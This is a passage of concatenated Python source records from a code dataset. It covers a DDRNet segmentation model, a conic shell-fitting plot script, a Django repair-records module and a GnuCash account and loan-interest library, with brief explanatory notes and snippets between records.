size=original_size, mode='bilinear', align_corners=False)\n return x_\n\ndef get_ddrnet_23(num_classes=19):\n model = DualResNet(BasicBlock, [2, 2, 2, 2], num_classes=num_classes, planes=64, spp_planes=128, head_planes=128, augment=False)\n return model\n\ndef get_ddrnet_23slim(num_classes=19):\n model = DualResNet(BasicBlock, [2, 2, 2, 2], num_classes=num_classes, planes=32, spp_planes=128, head_planes=64, augment=False)\n return model\n\nif __name__==\"__main__\":\n model=get_ddrnet_23slim().eval()\n print(model)\n x=torch.randn(1,3,1024,2048)\n y=model(x)\n print(y.shape)\n","sub_path":"22届毕设-遥感图像实时语义分割/RegSeg/competitors_models/DDRNet_Reimplementation.py","file_name":"DDRNet_Reimplementation.py","file_ext":"py","file_size_in_byte":16683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
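The reimplementation above keeps the original DDRNet blocks but folds the commented-out `nn.Sequential` stacks into the `ConvBnAct`/`BnActConv` helpers. Since DDRNet targets real-time segmentation, a rough latency check is the usual sanity test; a minimal sketch using the factory functions from the record (iteration counts and input size are arbitrary):

import time
import torch

model = get_ddrnet_23slim(num_classes=19).eval()
x = torch.randn(1, 3, 1024, 2048)
with torch.no_grad():            # no autograd bookkeeping while benchmarking
    for _ in range(3):           # warm-up passes
        model(x)
    t0 = time.time()
    for _ in range(10):
        model(x)
print('avg forward time: %.3f s' % ((time.time() - t0) / 10))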
+{"seq_id":"379278088","text":"import sys\nimport numpy as np\nimport astropy.modeling.fitting\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport equation6\nimport conic_parameters\nimport theta_ratio_fit \nsys.path.append('../conic-projection')\nfrom conproj_utils import Conic\n\nXI_LIST = [None, 1.0, 0.8, 0.4]\nBETA_LIST = [0.1, 0.01, 0.0001]\nnxi, nbeta = len(XI_LIST), len(BETA_LIST)\n\nmethods = {\n 'headtail': 'match head to tail',\n 'gradient': 'match R90 and gradient',\n 'asymptote': 'match R90 and asymptote',\n}\n# Method used to get initial guess at tail parameters It isn't\n# critical how good this is since the fitting will sort things out\n# independently of the starting point\napprox_method = methods['headtail']\n\nntheta = 100\ntheta = np.linspace(0.0, np.pi, ntheta)\n\nfigfilename = sys.argv[0].replace('.py', '.pdf')\n\nsns.set_style('whitegrid')\nsns.set_color_codes('dark')\n\nNROWS = 2\nfig, axes = plt.subplots(nxi, nbeta, sharex=True, sharey=True)\n\nxmin, xmax = -5.0, 2.1\nymin, ymax = -0.1, 7.0\n# xmin, xmax = -7.0, 4.1\n# ymin, ymax = -0.1, 11.0\n\nytop = ymin + 0.98*(ymax - ymin)\nxright = xmin + 0.98*(xmax - xmin)\nwhitebox = {'edgecolor': 'none', 'facecolor': 'white',\n 'alpha': 0.7, 'boxstyle': 'round,pad=0.1'}\n\n\n# x-data for tail asymptote\nxa = np.linspace(xmin, xmax, 2)\n\n# Set up fitter for fitting the tail\nfit = astropy.modeling.fitting.LevMarLSQFitter()\n\nfor j, xi in enumerate(XI_LIST):\n for i, beta in enumerate(BETA_LIST[::-1]):\n ax = axes[j, i]\n\n # The exact solution to the shell\n if xi is None:\n shell = equation6.Shell(innertype='isotropic', beta=beta)\n else:\n shell = equation6.Shell(innertype='anisotropic', beta=beta, xi=xi)\n R, theta1 = shell.radius(theta, full=True)\n ratio = theta1/theta\n R_crw = R/shell.R0\n x_crw = R_crw*np.cos(theta)\n y_crw = R_crw*np.sin(theta)\n\n # Fit to head and approximate guess at fit to tail\n ht = conic_parameters.HeadTail(beta, xi=xi, xmin=0.0, method=approx_method)\n # Convert the tail to the form required for fitting\n model = theta_ratio_fit.hyperbola_ratio(ht.a_t, x0=ht.x0_t,\n tau=np.tan(ht.theta_t), D=ht.D)\n # Freeze the parameters that are external constraints\n model.tau.fixed = True\n model.D.fixed = True\n # Only fit over a certain range of angles\n #mask = (np.degrees(theta) > 100.0) & (np.degrees(theta) < 150.0)\n mask = (np.degrees(theta) > 100.0) & (x_crw > xmin)\n\n # Now do the fit to get an improved tail hyperbola\n best_model = fit(model, theta[mask], ratio[mask])\n\n # Update the tail component of the HeadTail instance\n ht.a_t = best_model.a.value\n ht.x0_t = best_model.x0.value\n\n # And calculate Cartesian arrays for the shapes\n x_head = ht.x_head(ht.t_h)\n y_head = ht.y_head(ht.t_h)\n\n x_tail = ht.x_tail(ht.t_t)\n y_tail = ht.y_tail(ht.t_t)\n\n # asymptote to tail\n ya = (ht.x0_t - xa)*np.tan(ht.theta_t)\n ax.plot(xa, ya, lw=0.3, color='orange')\n\n ax.plot(x_crw, y_crw, lw=4, color='y', alpha=0.7)\n ax.plot(x_head, y_head, '--', color='g')\n ax.plot(x_tail, y_tail, '-', dashes=[8, 4, 2, 4], color='r')\n ax.plot(0.0, 0.0, 'o', color='k')\n ax.plot(ht.x0_t - ht.a_t, 0.0, '.', color='k')\n ax.axhline(ls=':')\n ax.axvline(ls=':')\n ax.set_aspect('equal', adjustable='box-forced')\n\n if xi is None:\n text = r'Isotropic'\n else:\n text = r'Anisotropic, $\\xi = {:.1f}$'.format(xi)\n text += '\\n' + r'$\\beta = {:.4f}$'.format(beta)\n text += ', ' + r'$D = {:.1f}$'.format(ht.D)\n text += '\\n' + r'$x_t = {:.1f}$'.format(ht.x0_t)\n text += ', ' + r'$x_t - a_t = 
{:.1f}$'.format(ht.x0_t - ht.a_t)\n text += ', ' + r\"$\\theta_t = {:.1f}$\".format(np.degrees(-ht.theta_t))\n text += '\\n' + r'$x_h = {:.1f}$'.format(ht.x0_h)\n text += ', ' + r\"$\\theta_h = {:.1f}$\".format(np.degrees(ht.theta_h))\n ax.text(xright, ytop, text,\n ha='right', va='top', bbox=whitebox, fontsize='small')\n\n# Put axis labels on lower left panel only\naxes[-1, 0].set(\n xlim=[xmin, xmax], ylim=[ymin, ymax],\n xlabel=r'$x / r_{0}$', ylabel=r'$y / r_{0}$',\n)\n\nfig.set_size_inches(3*nbeta, 3*nxi)\nfig.tight_layout()\nfig.savefig(figfilename)\nprint(figfilename)\n","sub_path":"CRW-shapes/conic-head-tail-fit.py","file_name":"conic-head-tail-fit.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
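The fit above freezes the externally constrained hyperbola parameters (`model.tau.fixed = True`, `model.D.fixed = True`) before handing the model to `LevMarLSQFitter`. The same mechanism on a self-contained toy model, for readers unfamiliar with astropy's fitting API (the toy data and initial values are arbitrary):

import numpy as np
from astropy.modeling import models, fitting

x = np.linspace(-3.0, 3.0, 50)
y = np.exp(-x**2 / 0.5) + 0.01 * np.random.randn(50)

gauss = models.Gaussian1D(amplitude=0.8, mean=0.0, stddev=0.6)
gauss.mean.fixed = True                        # external constraint: not varied
best = fitting.LevMarLSQFitter()(gauss, x, y)  # fits amplitude and stddev only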
+{"seq_id":"137334669","text":"from retailapp.models import Store\nfrom retailapp.models import Product\nfrom retailapp.models import Repair\nfrom datetime import date\nfrom datetime import datetime\nimport retailapp.models\nimport logging\nfrom retailexcept import ValidationError\nimport json\n\nlogger = logging.getLogger(\"repair\")\n\n\ndef validate_repair(repair_data):\n \"\"\"validate repair\n \"\"\"\n logger.debug('validate_repair repair_data %s', json.dumps(repair_data))\n if \"store\" not in repair_data:\n raise ValidationError(\"Missing store\")\n else:\n store = repair_data[\"store\"]\n store_obj = Store.objects.filter(store_name=store)\n if not store_obj:\n raise ValidationError(\"store %s is invalid\" % store)\n\n if \"product\" not in repair_data:\n raise ValidationError(\"Missing product\")\n else:\n product = repair_data[\"product\"]\n product_obj = Product.objects.filter(prod_name=product)\n if not product_obj:\n raise ValidationError(\"product %s is invalid\" % product)\n\n if \"date\" not in repair_data:\n raise ValidationError(\"Missing date\")\n else:\n date_info = repair_data[\"date\"]\n try:\n datetime.strptime(date_info, '%Y-%m-%d').date()\n except ValueError as ex:\n raise ValidationError(\"date %s is invalid\" % date_info)\n\n if \"cost\" not in repair_data:\n raise ValidationError(\"Missing cost\")\n else:\n if not isinstance(repair_data[\"cost\"], (int, float)):\n raise ValidationError(\"cost %s is invalid\" % repair_data['cost'])\n\n if \"remark\" not in repair_data:\n raise ValidationError(\"Missing remark\")\n\n if \"customer_phone\" not in repair_data:\n raise ValidationError(\"Missing customer_phone\")\n\n if \"customer_name\" not in repair_data:\n raise ValidationError(\"Missing customer_name\")\n\n\ndef get_repair(store, id):\n \"\"\"get repair\n \"\"\"\n logger.debug(\"get_repair begin %s\" % id)\n repair_id = id\n repair = Repair.objects.filter(\n store__store_name=store).filter(id=repair_id)\n if not repair:\n raise ValidationError(\"Can't find repair number %s\" % repair_id)\n \n repair_obj = repair[0]\n repair_data = repair_obj.get_all_data()\n logger.debug(\"repair_data %s\" % repair_data)\n\n return repair_data\n\n\ndef add_new_repair(store, repair_data):\n \"\"\" add new repair\n \"\"\"\n \n validate_repair(repair_data)\n store_obj = Store.objects.get(store_name=repair_data[\"store\"])\n product_obj = Product.objects.get(prod_name=repair_data[\"product\"])\n\n #create object\n repair_obj = Repair()\n repair_obj.store = store_obj\n repair_obj.product = product_obj\n repair_obj.serial = repair_data['serial']\n repair_obj.date = datetime.strptime(repair_data[\"date\"], '%Y-%m-%d').date()\n repair_obj.cost = repair_data['cost']\n repair_obj.remark = repair_data[\"remark\"]\n repair_obj.customer_phone = repair_data[\"customer_phone\"]\n repair_obj.customer_name = repair_data[\"customer_name\"]\n repair_obj.save()\n \n ret = {\"id\": repair_obj.id}\n logger.debug(\"add_new_repair done %s\" % ret)\n return ret\n\n\ndef put_repair(store, id, repair_data):\n \"\"\"put_repair\n \"\"\"\n logger.debug(\"put_repair begin %s\" % id)\n repair_id = id\n repair = Repair.objects.filter(\n store__store_name=store).filter(id=repair_id)\n if not repair:\n raise ValidationError(\"Can't find repair number %s\" % repair_id)\n\n repair_obj = repair[0]\n\n validate_repair(repair_data)\n store_obj = Store.objects.get(store_name=repair_data[\"store\"])\n product_obj = Product.objects.get(prod_name=repair_data[\"product\"])\n\n repair_obj.store = store_obj\n repair_obj.product 
= product_obj\n repair_obj.serial = repair_data['serial']\n repair_obj.date = datetime.strptime(repair_data[\"date\"], '%Y-%m-%d').date()\n repair_obj.cost = repair_data['cost']\n repair_obj.remark = repair_data[\"remark\"]\n repair_obj.customer_phone = repair_data[\"customer_phone\"]\n repair_obj.customer_name = repair_data[\"customer_name\"]\n repair_obj.save()\n \n ret = {\"id\": repair_obj.id}\n logger.debug(\"put_repair done %s\" % ret)\n return ret\n","sub_path":"retailapp/repair.py","file_name":"repair.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
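`validate_repair` above repeats the same membership test for every field, and `add_new_repair`/`put_repair` also read `repair_data['serial']`, which is never validated. A hedged sketch of a helper that could collapse those checks (`require_keys` is hypothetical; `ValidationError` is the one already imported in the record):

def require_keys(data, keys):
    # Raise one ValidationError naming every missing field at once.
    missing = [key for key in keys if key not in data]
    if missing:
        raise ValidationError("Missing %s" % ", ".join(missing))

# e.g. require_keys(repair_data, ['store', 'product', 'date', 'cost',
#                                 'remark', 'customer_phone',
#                                 'customer_name', 'serial'])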
+{"seq_id":"299442476","text":"\"\"\"\n.. module:: account\n :synopsis:\n.. moduleauthor: Paul Bromwell Jr.\n\"\"\"\nimport re\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal, ROUND_UP\nfrom xml.etree import ElementTree\nfrom collections import namedtuple\n\nfrom gnewcash.commodity import Commodity\nfrom gnewcash.guid_object import GuidObject\nfrom gnewcash.slot import Slot, SlottableObject\n\n\nLoanStatus = namedtuple('LoanStatus', ['iterator_balance', 'iterator_date', 'interest', 'amount_to_capital'])\n\n\nclass AccountType(object):\n \"\"\"\n Enumeration class to indicate the types of accounts available in GnuCash.\n \"\"\"\n ROOT = 'ROOT'\n BANK = 'BANK'\n INCOME = 'INCOME'\n ASSET = 'ASSET'\n CREDIT = 'CREDIT'\n EXPENSE = 'EXPENSE'\n EQUITY = 'EQUITY'\n LIABILITY = 'LIABILITY'\n\n\nclass Account(GuidObject, SlottableObject):\n \"\"\"\n Represents an account in GnuCash.\n \"\"\"\n def __init__(self):\n super(Account, self).__init__()\n self.name = ''\n self.type = None\n self.commodity_scu = None\n self.__parent = None\n self.children = []\n self.commodity = None\n self.code = None\n self.description = None\n\n def __str__(self):\n return '{} - {}'.format(self.name, self.type)\n\n def __repr__(self):\n return str(self)\n\n def __eq__(self, other):\n return self.guid == getattr(other, 'guid', None)\n\n def __hash__(self):\n return hash(self.guid)\n\n def get_starting_balance(self, transactions):\n \"\"\"\n Retrieves the starting balance for the current account, given the list of transactions.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :return: First transaction amount if the account has transactions, otherwise 0.\n :rtype: int or decimal.Decimal\n \"\"\"\n account_transactions = [x for x in transactions if self in [y.account for y in x.splits if y.amount >= 0]]\n if account_transactions:\n first_transaction = account_transactions[0]\n amount = next(filter(lambda x: x.account == self and x.amount >= 0, first_transaction.splits)).amount\n else:\n amount = 0\n return amount\n\n def get_balance_at_date(self, transactions, date=None):\n \"\"\"\n Retrieves the account balance for the current account at a certain date, given the list of transactions.\n If the provided date is None, it will retrieve the ending balance.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :param date: Last date to consider when determining the account balance.\n :type date: datetime.datetime\n :return: Account balance at specified date (or ending balance) or 0, if no applicable transactions were found.\n :rtype: int or decimal.Decimal\n \"\"\"\n balance = 0\n applicable_transactions = [x for x in transactions if self in map(lambda y: y.account, x.splits)]\n\n if date is not None:\n applicable_transactions = filter(lambda x: x.date_posted <= date, applicable_transactions)\n\n for transaction in applicable_transactions:\n if date is None or transaction.date_posted <= date:\n applicable_split = next(filter(lambda x: x.account == self, transaction.splits))\n amount = applicable_split.amount\n if self.type == AccountType.CREDIT:\n amount = amount * -1\n balance += amount\n return balance\n\n def get_ending_balance(self, transactions):\n \"\"\"\n Retrieves the ending balance for the current account, given the list of transactions.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: 
list[Transaction] or TransactionManager\n :return: Ending balance if the account has transactions, otherwise 0.\n :rtype: int or decimal.Decimal\n \"\"\"\n return self.get_balance_at_date(transactions)\n\n def minimum_balance_past_date(self, transactions, start_date):\n \"\"\"\n Gets the minimum balance for the account after a certain date, given the list of transactions.\n\n :param transactions: List of transactions or TransactionManager\n :type transactions: list[Transaction] or TransactionManager\n :param start_date: datetime object representing the date you want to find the minimum balance for.\n :type start_date: datetime.datetime\n :return: Tuple containing the minimum balance (element 0) and the date it's at that balance (element 1)\n :rtype: tuple\n \"\"\"\n minimum_balance = None\n minimum_balance_date = None\n iterator_date = start_date\n end_date = max(map(lambda x: x.date_posted, transactions))\n while iterator_date < end_date:\n iterator_date += timedelta(days=1)\n current_balance = self.get_balance_at_date(transactions, iterator_date)\n if minimum_balance is None or current_balance < minimum_balance:\n minimum_balance, minimum_balance_date = current_balance, iterator_date\n if minimum_balance_date and minimum_balance_date > end_date:\n minimum_balance_date = end_date\n return minimum_balance, minimum_balance_date\n\n @property\n def as_xml(self):\n \"\"\"\n Returns the current account configuration (and all of its child accounts) as GnuCash-compatible XML\n\n :return: Current account and children as XML\n :rtype: list[xml.etree.ElementTree.Element]\n :raises: ValueError if no commodity found.\n \"\"\"\n node_and_children = list()\n account_node = ElementTree.Element('gnc:account', {'version': '2.0.0'})\n ElementTree.SubElement(account_node, 'act:name').text = self.name\n ElementTree.SubElement(account_node, 'act:id', {'type': 'guid'}).text = self.guid\n ElementTree.SubElement(account_node, 'act:type').text = self.type\n if self.commodity:\n account_node.append(self.commodity.as_short_xml('act:commodity'))\n else:\n parent_commodity = self.get_parent_commodity()\n if parent_commodity:\n account_node.append(parent_commodity.as_short_xml('act:commodity'))\n\n if self.commodity_scu:\n ElementTree.SubElement(account_node, 'act:commodity-scu').text = str(self.commodity_scu)\n\n if self.code:\n ElementTree.SubElement(account_node, 'act:code').text = str(self.code)\n\n if self.description:\n ElementTree.SubElement(account_node, 'act:description').text = str(self.description)\n\n if self.slots:\n slots_node = ElementTree.SubElement(account_node, 'act:slots')\n for slot in self.slots:\n slots_node.append(slot.as_xml)\n\n if self.parent is not None:\n ElementTree.SubElement(account_node, 'act:parent', {'type': 'guid'}).text = self.parent.guid\n node_and_children.append(account_node)\n\n if self.children:\n for child in self.children:\n node_and_children += child.as_xml\n\n return node_and_children\n\n @classmethod\n def from_xml(cls, account_node, namespaces, account_objects):\n \"\"\"\n Creates an Account object from the GnuCash XML\n\n :param account_node: XML node for the account\n :type account_node: ElementTree.Element\n :param namespaces: XML namespaces for GnuCash elements\n :type namespaces: dict[str, str]\n :param account_objects: Account objects already created from XML (used for assigning parent account)\n :type account_objects: list[Account]\n :return: Account object from XML\n :rtype: Account\n \"\"\"\n\n account_object = cls()\n account_object.guid = 
account_node.find('act:id', namespaces).text\n account_object.name = account_node.find('act:name', namespaces).text\n account_object.type = account_node.find('act:type', namespaces).text\n\n commodity = account_node.find('act:commodity', namespaces)\n if commodity is not None and commodity.find('cmdty:id', namespaces) is not None:\n account_object.commodity = Commodity.from_xml(commodity, namespaces)\n else:\n account_object.commodity = None\n\n commodity_scu = account_node.find('act:commodity-scu', namespaces)\n if commodity_scu is not None:\n account_object.commodity_scu = commodity_scu.text\n\n slots = account_node.find('act:slots', namespaces)\n if slots is not None:\n for slot in slots.findall('slot', namespaces):\n account_object.slots.append(Slot.from_xml(slot, namespaces))\n\n code = account_node.find('act:code', namespaces)\n if code is not None:\n account_object.code = code.text\n\n description = account_node.find('act:description', namespaces)\n if description is not None:\n account_object.description = description.text\n\n parent = account_node.find('act:parent', namespaces)\n if parent is not None:\n account_object.parent = [x for x in account_objects if x.guid == parent.text][0]\n\n return account_object\n\n def as_dict(self, account_hierarchy=None, path_to_self='/'):\n \"\"\"\n Retrieves the current account hierarchy as a dictionary.\n\n :param account_hierarchy: Existing account hierarchy. If None is provided, assumes a new dictionary.\n :type account_hierarchy: dict\n :param path_to_self: Dictionary key for the current account.\n :type path_to_self: str\n :return: Dictionary containing current account and all subaccounts.\n :rtype: dict\n \"\"\"\n if account_hierarchy is None:\n account_hierarchy = dict()\n account_hierarchy[path_to_self] = self\n for child in self.children:\n if path_to_self != '/':\n account_hierarchy = child.as_dict(account_hierarchy, path_to_self + '/' + child.dict_entry_name)\n else:\n account_hierarchy = child.as_dict(account_hierarchy, path_to_self + child.dict_entry_name)\n return account_hierarchy\n\n @property\n def dict_entry_name(self):\n \"\"\"\n Retrieves the dictionary entry based on account name.\n\n Only alpha-numeric and underscore characters allowed. 
Spaces and slashes (/) are converted to underscores.\n\n :return: String with the dictionary entry name.\n :rtype: str\n \"\"\"\n non_alphanumeric_underscore = re.compile('[^a-zA-Z0-9_]')\n dict_entry_name = self.name\n dict_entry_name = dict_entry_name.replace(' ', '_')\n dict_entry_name = dict_entry_name.replace('/', '_')\n dict_entry_name = dict_entry_name.lower()\n dict_entry_name = re.sub(non_alphanumeric_underscore, '', dict_entry_name)\n return dict_entry_name\n\n def get_parent_commodity(self):\n \"\"\"\n Retrieves the commodity for the account.\n\n If none is provided, it will look at it's parent (and ancestors recursively) to find it.\n\n :return: Commodity object, or None if no commodity was found in the ancestry chain.\n :rtype: Commodity\n \"\"\"\n if self.commodity:\n return self.commodity\n if self.parent:\n return self.parent.get_parent_commodity()\n return None\n\n def get_subaccount_by_id(self, subaccount_id):\n \"\"\"\n Finds a subaccount by its guid field.\n\n :param subaccount_id: Subaccount guid to find\n :type subaccount_id: str\n :return: Account object for that guid or None if no account was found\n :rtype: Account\n \"\"\"\n if self.guid == subaccount_id:\n return self\n for subaccount in self.children:\n subaccount_result = subaccount.get_subaccount_by_id(subaccount_id)\n if subaccount_result is not None:\n return subaccount_result\n return None\n\n @property\n def parent(self):\n \"\"\"\n Parent account of the current account\n\n :return: Account's parent\n :rtype: Account\n \"\"\"\n return self.__parent\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n if self not in value.children:\n value.children.append(self)\n self.__parent = value\n\n @property\n def color(self):\n \"\"\"\n Account color\n\n :return: Account color as a string\n :rtype: str\n \"\"\"\n return super(Account, self).get_slot_value('color')\n\n @color.setter\n def color(self, value):\n super(Account, self).set_slot_value('color', value, 'string')\n\n @property\n def notes(self):\n \"\"\"\n User defined notes for the account\n\n :return: User-defined notes\n :rtype: str\n \"\"\"\n return super(Account, self).get_slot_value('notes')\n\n @notes.setter\n def notes(self, value):\n super(Account, self).set_slot_value('notes', value, 'string')\n\n @property\n def hidden(self):\n \"\"\"\n Is the account hidden?\n\n :return: True if account is marked hidden, otherwise False.\n :rtype: bool\n \"\"\"\n return super(Account, self).get_slot_value('hidden') == 'true'\n\n @hidden.setter\n def hidden(self, value):\n super(Account, self).set_slot_value_bool('hidden', value, 'string')\n\n @property\n def placeholder(self):\n \"\"\"\n Is the account a placeholder?\n\n :return: True if the account is a placeholder, otherwise False\n :rtype: bool\n \"\"\"\n return super(Account, self).get_slot_value('placeholder')\n\n @placeholder.setter\n def placeholder(self, value):\n super(Account, self).set_slot_value_bool('placeholder', value, 'string')\n\n\nclass BankAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.BANK\n \"\"\"\n def __init__(self):\n super(BankAccount, self).__init__()\n self.type = AccountType.BANK\n\n\nclass IncomeAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.INCOME\n \"\"\"\n def __init__(self):\n super(IncomeAccount, self).__init__()\n self.type = AccountType.INCOME\n\n\nclass AssetAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to 
AccountType.ASSET\n \"\"\"\n def __init__(self):\n super(AssetAccount, self).__init__()\n self.type = AccountType.ASSET\n\n\nclass CreditAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.CREDIT\n \"\"\"\n def __init__(self):\n super(CreditAccount, self).__init__()\n self.type = AccountType.CREDIT\n\n\nclass ExpenseAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.EXPENSE\n \"\"\"\n def __init__(self):\n super(ExpenseAccount, self).__init__()\n self.type = AccountType.EXPENSE\n\n\nclass EquityAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.EQUITY\n \"\"\"\n def __init__(self):\n super(EquityAccount, self).__init__()\n self.type = AccountType.EQUITY\n\n\nclass LiabilityAccount(Account):\n \"\"\"\n Shortcut class to create an account with the type set to AccountType.LIABILITY\n \"\"\"\n def __init__(self):\n super(LiabilityAccount, self).__init__()\n self.type = AccountType.LIABILITY\n\n\nclass InterestAccount(object):\n \"\"\"\n Class used to calculate interest balances.\n \"\"\"\n def __init__(self, starting_balance, starting_date, interest_percentage, payment_amount, *,\n additional_payments=None, skip_payment_dates=None, interest_start_date=None,\n subaccounts=None):\n \"\"\"\n Class initializer.\n\n :param starting_balance: Starting balance for the interest account.\n :type starting_balance: decimal.Decimal\n :param starting_date: datetime object indicating the date of the starting balance.\n :type starting_date: datetime.datetime\n :param interest_percentage: Percentage to interest on the loan.\n :type interest_percentage: decimal.Decimal\n :param payment_amount: Payment amount on the loan.\n :type payment_amount: decimal.Decimal\n :param additional_payments: List of dictionaries containing an \"amount\" key for additional amount paid,\n and \"payment_date\" for the date the additional amount was paid.\n :type additional_payments: list[dict]\n :param skip_payment_dates: List of datetime objects that the loan payment should be skipped\n :type skip_payment_dates: list[datetime.datetime]\n :param interest_start_date: datetime object that interest starts on\n :type interest_start_date: datetime.datetime\n :param subaccounts: List of InterestAccount objects that are subaccounts of this InterestAccount\n :type subaccounts: list[InterestAccount]\n \"\"\"\n if additional_payments is None:\n additional_payments = []\n if skip_payment_dates is None:\n skip_payment_dates = []\n self.__starting_balance = Decimal(starting_balance) if starting_balance else None\n self.__starting_date = starting_date\n self.__interest_percentage = Decimal(interest_percentage) if interest_percentage else None\n self.additional_payments = additional_payments\n for payment in additional_payments:\n payment['amount'] = Decimal(payment['amount'])\n self.skip_payment_dates = skip_payment_dates\n self.__payment_amount = Decimal(payment_amount) if payment_amount else None\n self.interest_start_date = interest_start_date\n self.subaccounts = subaccounts\n\n def __str__(self):\n return '{} - {} - {}'.format(self.payment_amount, self.starting_balance, self.interest_percentage)\n\n def __repr__(self):\n return str(self)\n\n @property\n def starting_date(self):\n \"\"\"\n Retrieves the starting date for the account.\n\n If there are subaccounts specified, the minimum starting date of the subaccounts is used.\n\n :return: Minimum starting date, or current InterestAccount's starting 
date.\n :rtype: datetime.datetime\n \"\"\"\n if self.subaccounts is None:\n return self.__starting_date\n return min([x.starting_date for x in self.subaccounts])\n\n @starting_date.setter\n def starting_date(self, new_starting_date):\n self.__starting_date = new_starting_date\n\n @property\n def interest_percentage(self):\n \"\"\"\n Retrieves the interest percentage for the account.\n\n If there are subaccounts specified, the sum of the subaccounts' interest percentage is used.\n\n :return: Sum of interest percentages, or current InterestAccount object's percentage.\n :rtype: decimal.Decimal\n \"\"\"\n if self.subaccounts is None:\n return self.__interest_percentage\n return sum([x.interest_percentage for x in self.subaccounts])\n\n @property\n def payment_amount(self):\n \"\"\"\n Retrieves the payment amount for the account.\n\n If there are subaccounts specified, the sum of the subaccounts' payment amount is used.\n\n :return: Sum of the payment amounts, or current InterestAccount object's payment amount.\n :rtype: decimal.Decimal\n \"\"\"\n if self.subaccounts is None:\n return self.__payment_amount\n return sum([x.payment_amount for x in self.subaccounts])\n\n @payment_amount.setter\n def payment_amount(self, new_payment_amount):\n self.__payment_amount = new_payment_amount\n\n @interest_percentage.setter\n def interest_percentage(self, new_interest_percentage):\n self.__interest_percentage = new_interest_percentage\n\n @property\n def starting_balance(self):\n \"\"\"\n Retrieves the starting balance for the account.\n\n If there are subaccounts specified, the sum of the subaccounts' starting balance is used.\n\n :return: Sum of the starting balances, or current InterestAccount object's starting balance.\n :rtype: decimal.Decimal\n \"\"\"\n if self.subaccounts is None:\n return self.__starting_balance\n return sum([x.starting_balance for x in self.subaccounts])\n\n @starting_balance.setter\n def starting_balance(self, new_starting_balance):\n self.__starting_balance = new_starting_balance\n\n def get_info_at_date(self, date):\n \"\"\"\n Retrieves the loan info at a specified date for the current account, or all subaccounts (if specified)\n\n :param date: datetime object indicating the date you want the loan status of\n :type date: datetime.datetime\n :return: LoanStatus object\n :rtype: LoanStatus\n \"\"\"\n if self.subaccounts is None:\n return self.__get_info_at_date_single_account(date)\n return self.__get_info_at_date_subaccounts(date)\n\n def __get_info_at_date_single_account(self, date):\n iterator_date = self.starting_date\n iterator_balance = self.starting_balance\n interest_rate = self.interest_percentage\n if interest_rate > 1:\n interest_rate /= 100\n interest = 0\n amount_to_capital = 0\n while iterator_date < date:\n previous_date = iterator_date\n if iterator_date.month == 12:\n iterator_date = datetime(iterator_date.year + 1, 1, iterator_date.day)\n else:\n iterator_date = datetime(iterator_date.year, iterator_date.month + 1, iterator_date.day)\n applicable_extra_payments = [x for x in self.additional_payments\n if previous_date < x['payment_date'] < iterator_date]\n if applicable_extra_payments:\n for extra_payment in applicable_extra_payments:\n iterator_balance -= extra_payment['amount']\n if iterator_date > date:\n break\n if iterator_date in self.skip_payment_dates:\n continue\n\n if self.interest_start_date is None or iterator_date >= self.interest_start_date:\n interest = Decimal(interest_rate / 12 * iterator_balance).quantize(Decimal('.01'), rounding=ROUND_UP)\n 
amount_to_capital = self.payment_amount - interest\n else:\n interest = 0\n amount_to_capital = self.payment_amount\n new_balance = iterator_balance - amount_to_capital\n if new_balance < 0:\n new_balance = 0\n iterator_balance = new_balance\n\n if iterator_balance == 0:\n break\n\n # Zero out if we're still before the requested date (debt has been fully paid already)\n if iterator_date < date:\n iterator_balance = 0\n iterator_date = date\n interest = 0\n amount_to_capital = 0\n\n return LoanStatus(iterator_balance, iterator_date, interest, amount_to_capital)\n\n def __get_info_at_date_subaccounts(self, date):\n iterator_balance = 0\n iterator_date = None\n interest = 0\n amount_to_capital = 0\n for account in self.subaccounts:\n account_status = account.get_info_at_date(date)\n iterator_balance += account_status.iterator_balance\n iterator_date = account_status.iterator_date\n interest += account_status.interest\n amount_to_capital += account_status.amount_to_capital\n return LoanStatus(iterator_balance, iterator_date, interest, amount_to_capital)\n\n def get_all_payments(self, skip_additional_payments=False):\n \"\"\"\n Retrieves a list of tuples that show all payments for the loan plan.\n\n :param skip_additional_payments: Skips additional payments if True.\n :type skip_additional_payments: bool\n :return: List of tuples with the date (index 0), balance (index 1) and amount to capital (index 2)\n :rtype: list[tuple]\n \"\"\"\n if self.subaccounts is None:\n return self.__get_all_payments_single_account(skip_additional_payments)\n return self.__get_all_payments_subaccounts(skip_additional_payments)\n\n def __get_all_payments_single_account(self, skip_additional_payments=False):\n iterator_date = self.starting_date\n iterator_balance = self.starting_balance\n interest_rate = self.interest_percentage\n payments = list()\n if interest_rate > 1:\n interest_rate /= 100\n while iterator_balance > 0:\n previous_date = iterator_date\n if iterator_date.month == 12:\n iterator_date = datetime(iterator_date.year + 1, 1, iterator_date.day)\n else:\n iterator_date = datetime(iterator_date.year, iterator_date.month + 1, iterator_date.day)\n applicable_extra_payments = [x for x in self.additional_payments\n if previous_date < x['payment_date'] < iterator_date]\n if applicable_extra_payments and not skip_additional_payments:\n for extra_payment in applicable_extra_payments:\n payments.append((extra_payment['payment_date'], iterator_balance, extra_payment['amount']))\n iterator_balance -= extra_payment['amount']\n if iterator_date in self.skip_payment_dates:\n continue\n\n interest = Decimal(interest_rate / 12 * iterator_balance).quantize(Decimal('.01'), rounding=ROUND_UP)\n amount_to_capital = self.payment_amount - interest\n payments.append((iterator_date, iterator_balance, amount_to_capital))\n new_balance = iterator_balance - amount_to_capital\n iterator_balance = new_balance\n return payments\n\n def __get_all_payments_subaccounts(self, 